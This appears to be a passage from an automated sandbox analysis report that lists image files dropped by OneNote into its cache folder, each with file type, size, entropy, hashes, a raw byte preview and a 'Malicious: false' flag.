Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................v.E.............................................S..........................Aa..!12Qqw.....3568rv........".....4Btu.....#Rs.(W..bg.................................D.....................1..2.!4Aqrs....Qa......t..."3BRb....#.$S.Cc..............?...K/h._+.N6.-.a...5...;.r....,...0B.s(..zp..4.%r\|q..E.Q^.../...C.R..?u.q8XN.>.e..:..gJ...._.n>.70G,..(........3b.&.5m...Q../...7Ie..k....e.l6..&..`Gt.P.Y^r...=..Y.e...N.B...O.#..J+........u.V;G.'.....V.]8..C.]..........E.....c..w&lX..f..\T.J?...F.,..m\|..93........,.....+.R..WG...%.....(@.....p].iEz<.8.^...J.h.....a8P.1......(z..y~.........H.Z^.>..<.....L.k..IG...R.(.%..m....&u...B\|.....@]ey.W.J...!d..R.8...[..>8....(.G......!.)X.....,'..F2.Z.t..Aw./..Z..#..i.kK.......b.i...qR.(....RE.............O.XP.#..(...9J..]...,.2.[w....KrW'...tY.......{~.:.+..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002I.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
Category:	dropped
Size (bytes):	2268
Entropy (8bit):	7.384274251000273
Encrypted:	false
SSDEEP:	48:N9YMn9H5gXlM26vroVXWxyNnl1LmLR+rn4FOeewGhDbby:/h9SlMdgm09ll8R2/rby
MD5:	09A7AE94AA8E517298A9618A13D6E0E2
SHA1:	FA5181A7414BA32F816BF0C4278EC20C615E8B1A
SHA-256:	3C68C7EE798E62A4A99C740153F3980D7DF029605C843410942C7F85E794823B
SHA-512:	074E9A2BE2039D0AFEAD360157550B934FABD0CB86B5AF476C1FBC885EE60331F5A68EAF70BF76E23C8248A20FB900346839F4AA8892370B5889E64948DCC6E2
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........i..".......................................3......................!.A..1Q."q.2BRa.b...#$................................... .......................!12AqQ.............?..D.z.4....;.....7...3.t<!..d.O.....+O+.;.z6.4cz7E.........U.Z)-..@..y...........}(W...<.xv/...5.ew......yN....n.Tk.Tm.Ty.vA=...T..U....h...e.8.5%....'......e^......L.g.$.~e..O.._...... .F`.....xnL.<.......]jfv...}..\G..c.......-%...#.C.\|.].`..^..W..c..B..5D.QSTaZ.5A=....BU..z%.4.h.6..=..U...W.$..l...7.:...........IPQT_...~..i..x....~.l.\|.n.J..TV.21.Tg.....................j.z!+.-............"j.j...)..TT...."....T.Tc.j..............j.z!.h...&.&.&..e.%..TksTW%G.?".l+$..c._9..[x...TU..........i~X..#'.qm?ttO.....}.i...q.....9..r..?..W..d.w...f;..q...tZh..0.....2.......OD%Q-.......$......56.K.O...y._.._C.k..p9.p..O..vu...'........0v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002J.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
Category:	dropped
Size (bytes):	784
Entropy (8bit):	6.962539208465222
Encrypted:	false
SSDEEP:	12:869YM8fij0W/xfuCp7ovv1bidiMn3bGi6AETQcdH8SADjoZgV6v9jUEvS3/g:N9YMWeI424diMn3yinsQeHvADu9QEvJ
MD5:	14105A831FE32590E52C2E2E41879624
SHA1:	078FA63FC7DB5830E9059DF02D56882240429D90
SHA-256:	D0A3A1C3CD63C4023FE5716CBE2C211307D0E277E444D9EF76C7FC097A845FD4
SHA-512:	8FC0ED24E8EC14C46EA523D9265DE28F85C5FC57AA54AD5B9CA162E95F79221E2AD3DD67D1293CF756B67F3D3DECAE122254134EA8D4D00DDED02114B5383947
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......a.L..".......................................-........................!A."1.Qbq....2Ba.........................................................1............?.....3.Ty\......vs....>.>..a.W..s89.d...Z}......rz...`...Z.r.do....u.W.%....gf.>.L..xz....B8=w...g.~g."HD...$..IKJ......nn..ly..I....L...\q...Q;6.KrxZ.,...j$..ZQ..)f...q`...C1..cZ2]-..\.~..J.....^..(.f..9m?..C.NI.UL..X.fy.Z.........+n....r."Z...d..R./\.#...kd.D.5.!...h.3*s-+.......Xjt..}i..rK..y.../>u..]N.....Y..J......1.x./.....F6.......I...._3...k.sM.+..v;.%\|.f.~.......:y....S....UKovh...W'........lF... .................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002L.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
Category:	dropped
Size (bytes):	3009
Entropy (8bit):	7.493528353751471
Encrypted:	false
SSDEEP:	48:aRCTf+0hagMrbAZMJShPdvF/5OzlQFlDF7npkDdWvVBTEnBLT6NrgCX0:D+0YgMrApL553JtEdEVcL2NcX
MD5:	D9BD80D40B458EDB2A318F639561579A
SHA1:	83BA01519F3C7C1525C2EA4C2D9B40F28B2F2E5E
SHA-256:	509A6945FACFB3DDC7BE6EE8B82797AD0C72DB5755486EE878125A959CC09B59
SHA-512:	C368499667028180A922DD015980C29865AEF4A890C83E87AE29F6A27DC323DD729E6FB1C34A2168A148E6A7A972F65A5FC8ACE6981AF1D4E7057D99681CB366
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................... ! ..''*''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666........_.........................................:.......................r.!12BQ...3Aaq.."CRb.....#4$c.S.....................................................1A............?..p..-.....u0$.......l......)..o.FTd..DG....... .te..jO..Z.U......r..j.O.,..VD./.....V5D.&......A..Zi....E.N..............#..M<\|.2.Y.../QO.x.cTM4......+.F;V.x.de....]e..O.x.c\Y........r..j.O.,..T...hw..k.^.[B..J.sEl.w.x.m.5%zzt0..T.......b..<\.3Q..W</..!.xh6..Z..\.+M.o.Y..1............#.........\|.a.l.KR>..U......e....@...\.1Z...Y...[....F.6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....Uh....FkYm.m`P...W .V.g..FjVj.\..1Q6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002M.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
Category:	dropped
Size (bytes):	2266
Entropy (8bit):	5.563021222358941
Encrypted:	false
SSDEEP:	24:TuRCTP9rSTfIEe1HbcVY1YbDXq8eCI0bf2QQe0GVDQAzZw:aRCTN7HbcW1YbDXq+I07Ien0AVw
MD5:	DB8A181E3F0EAD4A9472099E42ED6BE3
SHA1:	92096AF05CC6167B1AA816811A1160B809393FA2
SHA-256:	E9746B4E9AE9CE7B3B0068779DB3E113E2DFC9880F25373D745D0E700E69A906
SHA-512:	A9E246E10E28D057090BA9F034ECE6131780D7F794C5C9421523388997C7EDFBB49BC32B863B6C6668911B359C304AA54969B48CB9234950D5CECD2A6F3EFFF8
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666......r...........................................5.......................!1AQ..2a...."Rq..#3BSr..C..................................................................?...X.....U...j...F.W.V]'KV.uWt.iT...{.......`.(.....V%..=.....z......V..ct+.U.B...@.............................................{.....5.........0...x4....c..;...........+......\|.7E.%.9.1+}..d.........+.V#.P.HUL.E...g.li...8.>U.";0pi.]5.\..zo..."@.........................................y.6.mLN..S.....@...i..A..p.......~\|V9.+.Xy.........+,L.....7Z7..p...-X...\.....:-...i....v.1...-..H....9.zk....l....^.......:.."^.t.Q.F...X..B..$............................................a.%f&3..1.5+.X..'b7bwr.).e.x....!...H...aa_..kD...b..g..p..K^.k..qX.[,.........Q...U..x...YMvj...w..:k.....j.W.8..4....c.u.}m.....o.=@.......j.S.t.\|.....5h.y.%.~...G

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002O.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	99293
Entropy (8bit):	7.9690121496708555
Encrypted:	false
SSDEEP:	1536:Moq1jVORV5NO5xLCBaaNk4vhpCr1CH/DATOQlWvHMHojiaAMrxArLFRZPj19AWFz:eVEbouBaIk4T8uDGOQlVHvaAMkhDh95V
MD5:	EA45266A770EEA27A24A5BB3BE688B14
SHA1:	9F0B23B3C8EBA4FC3C521E875EF876FBE018F3C8
SHA-256:	EDAD0F03E6FF99FEF9EF8E8B834CE74F26CD23C5F8C067F5CEE66F304181E64D
SHA-512:	D4EE36BDA897BBD643A699A0332DD00DE9CDCC6F46D861789BAD259A4BF87868AE3B4CFAAB6DFAF29941C7055B77A95D76BAA86A4A0DB2BF3BAF7E3317F03EB9
Malicious:	false
Preview:	.PNG........IHDR...-...c............sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..[Oh\E...y3kv........`.%m.R..6.1.4).o..Ki...D.......P!.].=..K...C[....f.}o7VPJIg...{3.\|....d.....i..=.4.u0...n y......@j..Q..f)..mQ...4-SJ..9.d.?..5\-....:b.W..i...c.5..{..pj#.....B1C/.I.......].Su.k?.2..:.9Q...5.U...UZ...e..U.c],..2.}...1..)W./..Epr.Zt.....K.=..{......e..."...v..B.4.#....A.V1.".V}t..[..2f..Y..V9.".6.......(..gbm.P.....Y%2.c.z.:Q.2.<tYF.....u.@..KJ.;u.q:.].....$.....V....Hqk..DW.l.e.j.Z.YP?:'R...<........6...m@..r..j2..HK"\|..L.Nc..D..y.9..B4$.......`.3.m1LE....7(OU\+./.O...%6T..w......h....).I.&n.........#..W.41...5.#.`..I...<.?.\|..+Q.....#i........$,..n...`.s....[..E. T.w..j.,&-.r..;a....#.>(.P......f...MU\3..;B....)..5....z..(....-...a.....}y.l..E...z>......&..g.$.....*T...N....E:./.>..#...^..E.0..%......(..@..W.X.NDM.<~.]A.>..fW.O.y.'...Z...h..).F..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002Q.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
Category:	dropped
Size (bytes):	2898
Entropy (8bit):	7.551512280854713
Encrypted:	false
SSDEEP:	48:N9YMTXc4gpw+EIWnqQ5G+NE9VTzRFvS4+Xh+AKrNx+JuCluc3Eeky8etajhDCFex:/hDc4rPIoNEzbS4+XhOrGJu1cUHeoVey
MD5:	7C7D9922101488124D2E4666709198AC
SHA1:	00CC44A1B84D4D94A0ACE8834491EB5F65D04619
SHA-256:	20016E5FA1A32DCE5AF4E92872597E36432185A7BB2E61C91F362BD68484529B
SHA-512:	882944B2CF040485899128E03B7499C540D481E45FE8017DBF4FE0330157B2D8ABB7334DDB31C112BA0EFE3722A554883917C54155A7F60044D2D7F3D848260F
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......k....".......................................2...........................c.....TUb...Sa...QRqr..............................!.....................Q...R..!..............?...$.)m.1...%%bV.J..H....-.%a[...I"WJ..:.X.:TT.$.......N.-NR.E..-NR.E...9..E....$.k.....B.I,I)..J...kr..+)..I,Yj..YbI..+,J..e..Z..V.e.$V..TV.X..V.YQZ.EQ..U%PY[.[.R.EP............................\| F.. ...j...!m.!j.I%.j.$...YeEYYEEUE..eY[.hEEUeEil.....%..el...V..TUYA.U.UTTUT.Z..UQQUQE...V.,...UlE.U[.lEP.P.@......................................R1...AR1m.....#..$:.T.p..IJ.t.....A..AH.,5..]F!a.XJFaa. ..a.!.aa. X.e.......bB.b..,HX[,!..,,.c0.,..U..X..(,,...B(.,..4..B.`..".a..-......"...........................>D..IKEb...t.....)u.....)K.%+L\.J]i)*b.JR.IIL\i)u....T............T.....qs.it.iJ...])ZJb.....X....U.A...V1..B.R1....X...,.c...,%X...,%#0...,H

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002S.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
Category:	dropped
Size (bytes):	29187
Entropy (8bit):	7.971308326749753
Encrypted:	false
SSDEEP:	768:RwjBOlCk+nYnGagKJWJhwMJiRO22ZIm4VXvXx1tA6BQs:i8snY3JW7uROlEfbtVL
MD5:	DF99CAAAB9A7DE97B63343E60A699AB6
SHA1:	B84334135CFB73BC6EF55F85926770D5AC6DFEA8
SHA-256:	74C131777E7C437FD654427417097BC01B0813BA8E1E50E4B937BD50A1BEBCDB
SHA-512:	5D15AAAA8B71DDFE01A7C0ADE16D9E1F5E9AAE484BCD711B38CCB103ED9564CAAC23A0031471167B660E15972D70179C2A387509B213C05D60261042A0456025
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.........................................................................e..............................................`.............................!1Qq...2ARa..."#.....3BSbr...$4C...Tcs......%&DUd...E....56Fe....................................H........................!1Qa..Aq..."b....2R...BSr..#...3..Cc....$%4...............?...b.d.8T1.;#.S.DO...~.R.......3.xe...z.6..."m..k...;.'.f.5^.....m..<$....8.R.j.D.v..>...dT..vGbt...I......sEWp.r3.. ..G...6.....w...l.S..q...b.....-R....^Zu5+u6...A..Z].:...5..Uzn.,l.L.....?%..S.+zVg7.=.s.Q.....8..:,c.......ZE...>'IF..W.0.d.......c.e.d.V.t..S$.DNR.[....g..#i.$. .U.SK2.....k...J5u u\R.....T.[4..A.O..,.T..................] .i...B.m.^f....._...{S.....<......:..\|D...+...NA....Y.^f.1\|..%K~1..B..^...S..v=.c..g.tX[..kTJ..t.gr....R..@.F....5j..2.K.9..g.1N......U...^w......>+.l.v...@N....%Qd...t.Ni.....0;lggm...K".+!.,.....[J...>..?f.]._;

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002U.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
Category:	dropped
Size (bytes):	4819
Entropy (8bit):	7.874649683222419
Encrypted:	false
SSDEEP:	96:/hnQiz+ET2/hDi+tv34VtpWfowTHgegb6hhLT1NTS:5nQ6TAhLtvIzMvbi6hhF0
MD5:	5D6C1F361BC04403555BE945E28E53FC
SHA1:	00C254F7B3BC0289590C2BBDBB39C8EC2E2B2821
SHA-256:	131D637CDC5D0B094FB9FAD17F4D2A1ACE0D03613588155AACAA2D1CB4E16DA9
SHA-512:	34D2C0929FCC3CC10D0A2121BD55BFA9A07062C2A7B8F101071164C946895DBCB2777641E79DE4193D57A3F0778DD4F1351FAF333B7E4B4DBE31A32DD69C51F9
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................<........................!1..AQaq"...2B...#Rb..r..$3CS.cs..................................................!1A............?.............u....p.p($.Y...9,j...V...S86yh.G.#m.5..9...6Y.."C.R:.[..-.7U3c:..].;.....f.?%..<T...&F.Lh.N...m]..x.D.g<B.....k..S........>j.K....#U..Z....<e.:..8....o..xq.[..4v..U..y...k... k....A#..A...pn.jJ.I.7:..{.b..ns.t,...8.Td.I....m.I.5Z.).-.. ]..X.Do%.....?..4jV.`llt.E...5...u.\|..\F.=.F.r<...5dV....xc.%..&...4,...f...3..H.<......eQ...P.J....7...lLc..?..-.fR..7.#.6.......}:.]'.ny..........e;u.Y..$0...i..-....f..9(....}..T,.Inb...+=Cca7....WULA1@.s...4uY5.N.f.c..].ks.....3v..~..k..m)...f gNE`S......#.....Z..6.uc.m...#k.s.f.l.$6..?..xC.Cm.`...N2..&H...._.&.E...[....f.Z./...!.a{K..#.V.5..v.B....1...9..B.&....%s.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000030.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
Category:	dropped
Size (bytes):	1717
Entropy (8bit):	7.154087739587035
Encrypted:	false
SSDEEP:	48:N9YMzO6BOfqH/dAIWpdAIWpdAIWpdAIWUtr/SD:/hzJgfqHaPYPYPYPUt/i
MD5:	943371B39CA847674998535110462220
SHA1:	5CA79B7BD7E0E93271463FAEF3280F1644CBA073
SHA-256:	9C552717E8D5079BBB226948641FF13532DF3D7BE434C6CE545F1692FA57D45A
SHA-512:	812541836C8B6F356A4D530E5CCF1CFDCC4CA54AF048CAC19FE86707CE5EA0F41D73C501821AC627AD330291EF58C040DFC017923A7886CEEC308048DA2CE7C9
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......-...."........................................&.....................U.....1T..S.R.Q.................................................R....Q.a............?..d.. ...............................................+A...Z+E...V+E...U..R.....}........Q..Ah....Ah..b.AX..b.PZ+A...V+E...V..J....Q...b.Q..Ah....Ah..b.Ah..b.PZ.(.@z.?.`;2.......................................................Q...b.Q..EZ.(..Z>.G.....`Z+E......J....F+D...F+E.......b.Q...h....PZ+E...V+E......J*....F+D...F+E..............[u#...a-...f<.9^[...l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m..0.....l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000032.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
Category:	dropped
Size (bytes):	3555
Entropy (8bit):	7.686253071499049
Encrypted:	false
SSDEEP:	96:/h3JeYCQV5Hn++9HBdAjU78S/mjLLwqnqahJD:53Je8b+EBdAjm8S/mjLLRnphJD
MD5:	8A5444524F467A45A5A10245F89C855A
SHA1:	ACE68D567B02B68275E0345C86DB1139C0EC1386
SHA-256:	7D2B01F17354D9237A6AB99D5B9AFDF0E1CC43687125848B0C2DEDFB44CE3843
SHA-512:	8151B447B60D110C32EC1EF286B941FFC09B99140F41BBACF5A1650A385FF4D13C0DDB2878E9A470FC7CFCC95A1AB6E44F6DE72562B0FFE093DC8A3C3C7FCC14
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................2........................!1AQ.a."2q.B..#R...3C................................ .......................!1.AQBq............?........)&vD.)3Hn..X+....r...tmL.k..(.E...R. .Z..&...,fJ...!...6..S\t3.=...g&..Bqe.)_U.....1......-..fl.................J...u.i.mU..K..v.w.0O..E.h..D~K.(..9.,8..E.}.............i.\.....t."v..q..C............<..\|3.........................Q..../c.....f.}8....D..\|k..Z......0..~..c..e..m(...\|.c..'.5.5............==bx.5x.8...T;....=.--.pc...I;.V.m..,(....}...NH.ho....Q..U.E$.~...w.t>.S\....'f.{.+.g._.t....;>.....P...........-..G.h..2...J.% !.E97Ir.D..N....j...oE._...._...".?.......#".S.........Q.Tc.I..*I..k.......=$.........sk1Jp.\K.....F.3.Q..q..J....N..[l.&....OR4bB\|..2ul....J...B.$&H..9#j.f.n./........?R~....B.I.@..........m

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000034.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
Category:	dropped
Size (bytes):	3428
Entropy (8bit):	7.766473352510893
Encrypted:	false
SSDEEP:	96:/hdu7isPwAp7zesusUyYAatNG87llTONQYS:5di5tfuQ9atNZlaC
MD5:	EE9E2DF458733B61333E8A82F7A2613D
SHA1:	A86704C969F51B86D6A05ED51C6C60214ED9FA89
SHA-256:	BE4F0E6C89FCE91B9EBD2623567F7DFC259E0E3C77C9158742B8F64B724DF673
SHA-512:	BFB5D6DD6B66EE21E946E90D1E482384CD10244308562DDA814189602681DADDE5752B80519E5B8515F115A71BD6BB4317A59BE65B8B5E3474AED119F8303569
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......r.F.."........................................H............................!Qaq.."12.....#3ARbr...$B...cd...&CSu.....................................+.......................12..aAQ.!#q.."................?...#...3.Za......rV.5&...../"..i.t...j..W........d.FL.V.2K....]t.f.d.NK..:.....f...... ......2.[...#..D...ZK....p.z.E.N..T..L.-....1....2.\.6FIr2..zS\U#..........fB\t..5J..~q...D....A.......!....MY..../.HY..../e.M.Y.n.~..,....'..Pc...l...d2..m.f.it$..qx-z...._..].cOO....n..&.....FIA.....2J2..d:<qc..6.I.G.N....f.K..Dx.-.......`....2.FZ."K7.r}..<.P.Z.da.Y.....8..s....G.....b.e..g .S.......FL.Z,&..q.MG.J+..x\..m...qN=.....)..`...&Y...S....u6{.z.g.....@......FL.ZL&.Iv.w..8....U..v....q.B.v_./A..#.#.g.j........*J;...u...W.Ao...%....#$.....M..^\{W.SO...s,.N.....c).,.B.Gv...."k..z."..S]H.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000036.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	65589
Entropy (8bit):	7.960181939300061
Encrypted:	false
SSDEEP:	1536:2Hlrjw3xL//DPgff+9j6yPWvHMHjkbfnwHO3AW3GL:2H2zDUU+yPVHITwNfL
MD5:	8B48DA9F89264D14B83FF9969F869577
SHA1:	E1BD58E2D80FEEF56DC514F3F0B3AB9669F22F95
SHA-256:	62AD3C277E54F03F1ADB44062407346F789E63859B7AFABFD64BE6AF5E9F66EC
SHA-512:	03B783EC968DF3F648504D068D64DD1AE110E28110FE5B3401C9D04F44897DBE0CBB5680D42CA4C665FA94A6CED4B559106EB3C06C9BF2C5B14951ECBFFAC8AE
Malicious:	false
Preview:	.PNG........IHDR.......{.....;Za.....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..Y=.+I....t.y...,^vv....;. "\|. .i7.....$.2g..']pH@p..]b....H.H.......d'@ B...U.xm..3{3k?..5n.._}U...3......~..>...g.....f..t...t:...p>..Si..d:..k:.Lf..t6.K.i....d<...x.8\.8.+lc...)i.$.r.....x.t.BG.R.cm.c...p.:&.6.4..K.......^...~b].0....oBYv..u.'.=.K.Q.g)6.....4.!.M......4.=....G.%.Sr........nxC.F..t.U........1...J.t..eQ....".... \|...81.$D.!.>...........$...^.vY..EY8tb..'.P.g#O....S..0'.V....x.W..........k.......s.C.S...J%.iVb..].........3....j.}.z....+.s..@..K.....\x.C..e.Qq.....;N.....;....,....^...$F..{G...8.#....8'..&....8..5.....3(P._....S......\|".....u.cr....+a-....&V..x...iI-<\|a.{E.c.X.......?..&.C....'........(.x....>...M.?.9..#X......l...0...Z.F..<.z.0}Q..Z1..........?h..`E$K.2o.Ac^.........D..uL=.}.#0.. M!.A.C......\|_..(.Y........!E... .O...`;....M+..x.u~g...q>...N."D^..K..x..D.`.!.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000038.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
Category:	dropped
Size (bytes):	1873
Entropy (8bit):	7.534961703340853
Encrypted:	false
SSDEEP:	48:N9YMw9kGzE4xTdow1C3kyIkyM66KeJY3fOxJ:/h8HzE4xTdoUCUyxyD6LCvSJ
MD5:	4FC8500BD304AD127AF4B5E269DFF59B
SHA1:	9A5E3432358A0FCDECE86AEB967319B93A65D14A
SHA-256:	B4DAA90D5A53FCBC85119050B5B76962443C4DD18D7F42CDC6D4E0AD8EFAD872
SHA-512:	E5E07054A522EB91EFD39722AFB3776389632B8F5F923C1D29796716D68CEC93BE5E44F79913804CEC7ED631FF520CBBBAAB841E01FB90AF8E8ADF84DCD47481
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......`...."........................................>.......................tu.....45.!#$%1s."fr...2Fq..AQe.Eav............................... .........................!AQR.............?..e4.bbu."m.G......u.S.-Qq.b.a..'#..E.......u.\|:.f[O..jS.S.&....=.....[.....S...N.~~...'...q....N.T.Oyf..a.6..%.I.1j.e~.4..[5.WW.Y..Xp.gn...u.......Gb.O.W..k.!mJgfq....~.F.......m..}bn4.5........s,F...z.b)..O.....5).-.-\....=`.fP....%...A..Q.&..9.....QQbD.%.:u.f...r$.10..W.F.T..MI...9...ZQH._..).....D..n.F]..........:.j...!6Z..S....0...B.6..Ga..S.O.....U8S_.J.>...i..?..<.P..........M..F.T.C..7.E...`.4BKcMh1j....4y...+.\|.^......2[.WG.W..+......E..r/V^".R...."..6..hht..f...........;E..Kx....)}Le.A.x.>..$/).._S.n.L......}..H^Sw...2. .v.io...../.........x.>..$/).._S.n.t^;O.....n...[.S...h.v.io...../....:/...[..7yK.c-

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003A.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
Category:	dropped
Size (bytes):	5465
Entropy (8bit):	7.79401348966645
Encrypted:	false
SSDEEP:	96:X0cZneDWlIKmXwxacOHHI6EhzNlSSDDgafbofgt7mGrw:XleDWlIJwQHihRdgu8imGk
MD5:	8470F9A96B6C6CAD9EE60961E96D19B2
SHA1:	AFE1F01FFA4E4CB06B1D770C9C59DA75B434D1AC
SHA-256:	2DF453410796AEC7B9EFEC00059B6CE64BCF67313A95AE458BA600EA5DE14811
SHA-512:	CAE5C2ED091BA49761F0348516D53491E578FB165F32F93AC7DAD927383E9A398B06229FAC6A8233777DF708E5001AE0037A1FA960293BDA49892C40B37F2240
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................E.e.............................................8...............................!"1...2A#Qa.$34bBDSqt..........................................................?.....`0.....O...3Sd..@..5.0....Q.pw....;....!pN.DR....`0......N^...k.=.u.e.7{.b........?z....zV...M.....P:a.SPj.....WRK.=x.2.h..2..AS..s..A..\|.Z/f$D.YX1pr......}G6._.~..)j...+.s.r".{..q..-.^@...#w\|.H...K)....g...y..`0......2.w@.Ro.d....@...K....}...&... y..f.y.0.\|DC..>p.[E.2......v..N.)Z..4.RF.D.8]..Z.\|f/..+\ID.r/.o........0i...G.O..uj..RN. ....j...xnF...Q.Ls.U.c.D0m....z.k.P;f...b.=..L.hH.,./;.U..`sa.I...?...I....M.0<.u....!..C..U.T.....s.Q......_..7K.......?....R\&=.<.u..oQ}WZ..Yu...{Fe3.h...@.s..mW.G..^....1.W.#[.q2.&u.c.G......`J./..X.C....M;.....3k$}.i.3...#/x.m.Oh.}FH]. ..5NNDIS.-.M~...6..w.d....P.;..k...........v*..T..L.P...s.!B.4..w

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003B.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
Category:	dropped
Size (bytes):	3361
Entropy (8bit):	7.619405839796034
Encrypted:	false
SSDEEP:	96:zDqnxqMt6gGr/Nln5ANln5ANln5ANln5ANln5ANln5ANln5ANllHN6:CxqMQr/rn5Arn5Arn5Arn5Arn5Arn5AN
MD5:	A994063FF2ABEB78917C5382B2F5FA8C
SHA1:	BD5C4D816B04A2B6596DFE38DB01228F553FACCC
SHA-256:	D72900E8DA72D1A7F3729971AA558E1E9B6E9CF9A0D51E83852E567256DBBFEF
SHA-512:	CF2279033DD3EDFE6F6F9E5C517BEBD9A52863EEFD90F57F7A5AE0E0485E705254BE7ED6B50E6CA142669687727AE85E2E6035F69930B75F2E6D3EEFA961EF88
Malicious:	false
